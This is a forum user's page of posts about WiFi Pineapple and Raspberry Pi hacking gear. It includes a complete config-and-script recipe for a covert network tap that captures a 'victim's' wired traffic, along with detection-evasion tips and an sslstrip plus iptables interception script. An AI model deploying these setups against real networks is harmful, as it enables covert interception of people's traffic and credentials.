telot
-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
Haha - I'm laughing more at the tinfoil lining some poor guys outside facing walls...but the paint thing is awesome! I've heard of it being used in R&D environments, but I thought it was outside the reach of your average consumer. After a quick google, the stuff is pricey but still do-able. http://www.slt.co/products/RFShieldingPaint/ShieldingPaint-YShield-HSF54.aspx
telot
-
Mr-Protocol: For sure. I'm still waiting with bated breath for Seb to release a new firmware with interceptor support (its been talked about since the mark4 came out, but I'm still hopeful).
inTheDMZ: I got Karma going as well on a previous project with the pi - digininja's guide was pretty easy to follow. I decided to go with the NHA for my pi-karma as well as this interceptor version. The card is just robust and awesome and wireless-N. I've left Karma off this build so far, because I ran out of time, and I'm not sure its a feature that everyone would want with a device like this. Karma is something that a good (or even semi-good) sysadmin would notice over time, and bringing attention to your wireless/wired network tap is probably not a good idea. Regardless, I'll still build it in so the option is there for people.
Cheers
telot
-
The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Heres how.
Hardware:
Raspberry Pi Model B
32GB SD Card
Belkin 4 port powered USB hub
Alfa wifi card (NHA, from the hakshop)
USB Ethernet adapter (also from the hakshop)
OS:
Latest image of rasbian
Software: All can be apt-get installed
bridge-utils
tcpdump
hostapd
fkill
hostapd
zd1211-firmware
hostap-utils
iw
dnsmasq
Edit /etc/network/interfaces to look like this:
auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet static address 192.168.0.1 netmask 255.255.255.0
Edit /etc/dnsmasq.conf
# Never forward plain names (without a dot or domain part) domain-needed # Only listen for DHCP on wlan0 interface=wlan0 # Create a dhcp range on your /24 wlan0 network with 12 hour lease time dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h
Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden)
interface=wlan0 driver=nl80211 ssid=monkey channel=1 auth_algs=1 wpa=1 wpa_psk_file=/etc/hostapd-psk wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ignore_broadcast_ssid=1
Next Create/edit /etc/hostapd-psk
00:00:00:00:00:00 YourSuperLongAndSecurePasswd
We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up.
#!/bin/bash #Change settings below to match network eth_ip="192.168.1.199" eth_netmask="255.255.255.0" eth_broadcast="192.168.1.255" brctl addbr mybridge brctl addif mybridge eth0 brctl addif mybridge eth1 ifconfig eth0 0.0.0.0 promisc up ifconfig eth1 0.0.0.0 promisc up ifconfig mybridge promisc up ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast tcpdump -i eth1 -w /root/cap.pcap &
And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local
# turn on forwarding echo 1 > /proc/sys/net/ipv4/ip_forward # enable NAT iptables -t nat -A POSTROUTING -j MASQUERADE # start the access point hostapd -B /etc/hostapd/hostapd.conf
Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP.
What it doesn't do:
Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want.
Things to add:
-Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd.
-Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file.
-Add Jasegar functionality to the wifi AP (this ones the biggy)
-Add the all important sslstrip functionality (something I've tried but can't get to work - if theres interest, I'll happily share my findings)
-Add in Moriarty's awesome new UWUI
So thats it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here.
Long live the interceptor monkey!
telot
-
Just signed up for the webinar :) Thanks for the heads up on the freebie router!
telot
-
You're looking for the interceptor. See the hak5 video on it. Unfortunately the hardware is hard to find these days (fon+). Irongeek has some how-tos on his site on using a raspberry pi, which is the direction I would recommend if you've got one handy.
Otherwise the wifipineapple mark4 should be able to be used as such, but it will cease to act as a pineapple as far as I can tell, and instead be more like an interceptor. This has not been done before, so it will be likely cause headaches, but whats awesome is you can share what you learn with the community and get mad bonus points!
telot
-
Not all the tools are available in apt. Many of them are, but not all (metasploit for example). BT is so popular because they've got all the dependencies, done all the tweaking, and worked through all the bugs for you. Its ready to roll, with nearly every tool available.
BT is based on Ubuntu, as you mentioned, so there is certainly nothing stopping you from loading what tools you'd like into Ubuntu. I certainly don't need every tool in backtrack, so I just pick and choose what I'm interested in. That said, I always keep a live disk and Backtrack VM's around just in case.
telot
-
Already got it going :) Now to figure out how to wire up a better switch that can be used with the case on it...
Thanks agian midnitesnake
telot
-
Holy shit its happened! Thanks midnitesnake!
Now to figure out how to upgrade my old duck...
telot
-
You are quite welcome skrite
In order to have backtrack see the alfa, you forward USB devices to the guest OS. Each virtualization suite will handle this differently, but they all have the feature.
To get a proper IP from your router (not NAT via your host) to the VM - simply setup bridge mode (at least thats what its called in virtualbox) for your VM. That way you can scan as if you're on the network, just as your mba is.
telot
-
As a fellow mba owner, I can understand why ubuntu (or windows) dual booting is not ideal. OSX is highly optimized for apples hardware and vice versa. You sacrifice battery life and oftentimes driver efficiency by booting into anything but OSX. Its a tradeoff that 90% of consumers never have to deal with, as they just stay in OSX full time. With that in mind, I would recommend going with a virtual machine of backtrack or ubuntu if you need the tools, but for the most part I just do like you were saying and use the terminal and wireshark in OSX.
The other downside to going with apple, is it doesn't work great with the pineapples ICS (as you saw from the link from an inebriated Mr-Protocol), but it is workable.
These are all tradeoffs we have to make in order to enjoy a great, if not the greatest, laptop.
telot
-
DrDinosaur - I believe Darren was using mdk3 for his occupineapple stuff. I can't really remember the details, but I'm a command line guy myself, so if you ssh into the pineapple, you can use these commands:
opkg update
opkg install mdk3
Then run the various mdk3 commands that Darren uses for the spoofing of list of fake SSID's.
pr0l3 - Have you read the pineapple book? See the pinned thread on these forums. If you're still having trouble, start a new thread and give all the details you can and I'm sure we'll be happy to help.
telot
-
Its been about a week since I last plugged this, so heres the usb card I use everyday, all day long and with all types of power packs (5-12v batteries and usb port powered). I highly recommend it
http://www.supertalent.com/products/stt_usb_detail.php?type=Pico
Enjoy!
telot
-
Is there a reason you want to run all those separately? I'd take a look at running these alternate OS's in virtual machines. If you get the ODD adapter you're talking about, put the 500GB in there and then buy a SSD for your main OS, of which I'd recommend windows or a well suited distro of linux (not backtrack). Also throw in an 8GB stick of ram (super cheap) and you're set. Running backtrack and windows 7 at the same time, each with 2GB of ram, each pulling as much space as they want from the big old 500GB - all while leaving you with the same 4GB of ram you have now plus a new screaming SSD for your host OS. Theres lots of advantages to this such as snapshots, not constantly rebooting to get into another OS, you can setup vlan's between your "victim" and "attacker" so you won't accidentally hack your roommates, etc.
telot
-
As I've now got Karma working on my raspberry pi, I'd love to see the UWUI ported to that :D
Doing a touch-optimized version for android tablets (even better - the n900!) might be fun and add some challenge for you as well. Thanks again for sharing this very nice tool with us Moriarty! Cheers!
telot
-
wychwood: Welcome to the pineapple community! We're always glad to have another pineappler added to our ranks.
Here is a link for a powered usb hub that I and other heavy users utilize everyday with great success:
http://www.newegg.com/Product/Product.aspx?Item=N82E16817394106&Tpk=F5U404PBLK
Perhaps the next iteration of pineapple hardware can be even more specialized and offer us 2 or 3 over-spec-powered usb ports...
telot
-
Hello all
I've been playing with my pineapple and my newly created raspberry pi running karma (all hail digininja!). Normally I test my karma'ing with my trusty "victim" laptop, but this time I decided to use my ipad instead. I couldn't help but notice that when I have sslstrip running, few apps are able to load, and when they do, there is usually some erratic behavior in the app. Either they sit and spin (loading animation) or just straight up fail (...Please check your network connection) or other bizarre behavior (facebook app on iphone says I have no friends when I goto my News Feed). This to me is quite the red flag raised to the vast majority of real world victims, who unless you're targeting a specific persons laptop with white/black lists, will no doubt be using a smartphone/tablet. With the proliferation of "post-pc" mobile devices, the lack of internet-connected-app support does not bode well for those of us who enjoy the benefits of sslstrip.
Anyone have any ideas on how I can fix this? It must be something in my sslstrip preparations/command that I can change right? Here is my usual "dump 'n strip" script that I run via wps button press.
#!/bin/sh tcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 sslstrip -w /usb/sslstrip.log &
I know, the port 80 to 10000 is weird, but thats what was in the how-to sslstrip forum post and I've been using this script for 6 months and it works fabulous otherwise. Any help is much appreciated fellas, as always!
telot
-
And do the "Find the Pineapple" game Darren has mentioned before!
Next time we'll plan better
telot
-
Parity: I recently learned about this by way of Security Onion. I needed a way to sniff all my traffic in order to run snort and snorby and all these awesome intrusion detection tools (which work best by sniffing the entire networks traffic). For the most part, yes, you'll find these "span" ports on commercial, industry grade switches (mega $$$) but there is a cheap alternative. The company is kind of no-name (Mikrotik), but the product is totally sound. I've been using it for months and it works as advertised without fail.
http://www.roc-noc.c...rd/rb250gs.html
TheKingUnderTheHill: Another option is to sneak a passive lan tap in there. You can buy one of the two available on the hakshop, or you can build your own quite easily with some spare cat5 cable and some female ends, which you can pick up at home depot...hehe pick up some females at home depot...
telot
-
Also saw it at Derbycon - Mr. P probably heard me guffawing at the ridiculousness of it.
Hot chick, sure. Iphone taped to her hand as main plot driver, sure. Good hacker movie? Nuh Uh. No way. Sneakers, Hackers, War Games - now those are decent hacker movies.
telot
-
The way that I know is by using Airbase-ng - a tool found in the aircrack-ng suite. Vivek has some videos on using airbase in his wifi megaprimer on securitytube.net. Theres pros and cons to using airbase over the pineapple (i.e. you can capture a wpa handshake with airbase). As cool as airbase is, I must warn you - its not nearly as slick as the pineapple is. Theres a lot of benefit to using specialized hardware for this task. As an example, you have to configure your own DHCP server if you want to use airbase effectively, whereas the pineapple of course is essentially all plug and play.
Since Mr. P didn't really answer this aspect of your question: the fon is another kind of wifi router that the karma/jasager was originally developed for by Mr. Robin Wood (aka digininja). Just google fon router and you'll find all the info you need about it.
Good Luck!
telot
-
Honestly, a wifipineapple might be a decent way to start. Its a great platform for getting your head around networking in general, sniffing traffic, deauthing (taking down an access point), phishing, and pranks. Watch the episodes on it and pour through the forums and wiki. Go back and read some old forums posts with lots of views and replies to see what problems and questions people have had.
telot
-
macbook air here - usb 3.0 works fine with virtual box running OSX as host
telot
-
odroid x2 might give you the oomph you're looking for petertfm, though multiple core support would be a must to get max benefit from it...
http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135235611947
The pi would be a good replacement as well - I've been using pwnpi to run my pineapple for months now and it works great. Use the pi when I need some horsepower (msf and set...though msf is pretty slow still) and use the pineapple soley for karmaing stripping and dumping.
Either way, this UI is looking sicker and sicker - can we get some instructions for use on the pineapple Moriarty? I'm sure I can get it going, but with all this rummed up eggnog, I think getting step by step instructions would be most appreciated! lol
telot -
For example:
scp -r -v OSXdir 172.16.42.1:/WP4dir/
so... scp -r -v /Users/chriswhat/Wp4Files/ 172.16.42.1:/usb/
telot
Pineapple Mark IV (Made in Home)
in WiFi Pineapple Mark IV
Posted · Edited by telot
1) Likely. Only red flag for me is the mobile versions usb devices. It depends how much amperage your usb hub is provided and thereby providing. Having two radios receiving/transmitting could cause intermittent issues if there is not enough power for the both of them.
2) Yes. Ethernet cable to PC. See Darren's wifi pineapple book for setting up the proper settings. You do not need POE. Power the AP1221U separately and connect your pc to the POE/LAN plug.
3) I'd do the pineapple myself. Remember when someone first broadcasts the ssid's of known networks they're looking for, its the strongest signal that wins.
4) No clue. I'd buy the one from the hakshop to be sure (and also support the team that made all this possible!).
telot